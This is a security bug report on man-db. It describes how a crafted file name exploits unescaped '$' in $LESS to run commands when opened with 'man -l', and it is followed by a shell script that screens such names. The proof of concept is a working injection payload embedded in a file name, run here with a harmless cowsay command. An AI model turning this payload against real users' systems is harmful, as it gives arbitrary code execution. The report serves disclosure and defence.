Package: man-db
Version: 2.11.0-1+b1
Tags: security
"$" is a special character in $LESS, but man-db doesn't take care of
neutralizing it. This could be exploited for arbitrary code execution if
the user were tricked into running "man -l" on files with names crafted by
the attacker.
Proof of concept:
$ cp /dev/null $'$+!cowsay pwned\n$+q-P.1'
$ man -l ./*.1
!cowsay pwned
 _______
< pwned >
 -------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
!done (press RETURN)
-- System Information:
Architecture: i386
Versions of packages man-db depends on:
ii bsdextrautils 2.38.1-1.1+b1
ii bsdmainutils 12.1.7+nmu3
ii groff-base 1.22.4-8
ii debconf 1.5.79
ii libc6 2.35-3
ii libgdbm6 1.23-3
ii libpipeline1 1.5.6-3
ii libseccomp2 2.5.4-1+b1
ii zlib1g 1:1.2.11.dfsg-4.1
Versions of packages man-db suggests:
ii apparmor 3.0.7-1+b1
ii groff 1.22.4-8
ii less 590-1
--
Jakub Wilk
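
A defensive check for the condition reported above, as an added example that is not part of the original report or of man-db: it vets file names before they are handed to "man -l". The function names are hypothetical, and rejecting "$" and control characters outright is an assumption of this sketch, not a description of how man-db handles such names.

```shell
#!/bin/sh
# Added example: vet file names before passing them to "man -l".
# Assumption: refusing any name with "$" or a control character is acceptable.

# Return 0 if the name looks safe for "man -l", 1 otherwise.
man_l_name_ok() {
    name=$1
    # "$" is the special character in $LESS named in the report.
    case $name in
        *'$'*) return 1 ;;
    esac
    # The proof-of-concept name also embeds a newline, so reject every
    # control character. The trailing "." stops $(...) from dropping a
    # final newline before the comparison.
    stripped=$(printf '%s.' "$name" | LC_ALL=C tr -d '[:cntrl:]')
    [ "$stripped" = "$name." ]
}

# Print how many of the given names would be rejected.
count_rejected() {
    rejected=0
    for f in "$@"; do
        man_l_name_ok "$f" || rejected=$((rejected + 1))
    done
    printf '%s\n' "$rejected"
}

# Hypothetical wrapper: refuse the whole batch if any name is suspicious,
# otherwise run "man -l" on the names unchanged.
safe_man_l() {
    if [ "$(count_rejected "$@")" -ne 0 ]; then
        printf '%s\n' "safe_man_l: refusing, a file name contains '\$' or a control character" >&2
        return 1
    fi
    man -l -- "$@"
}
```

Calling `safe_man_l ./*.1` in place of `man -l ./*.1` refuses the batch when a glob expands to such a name.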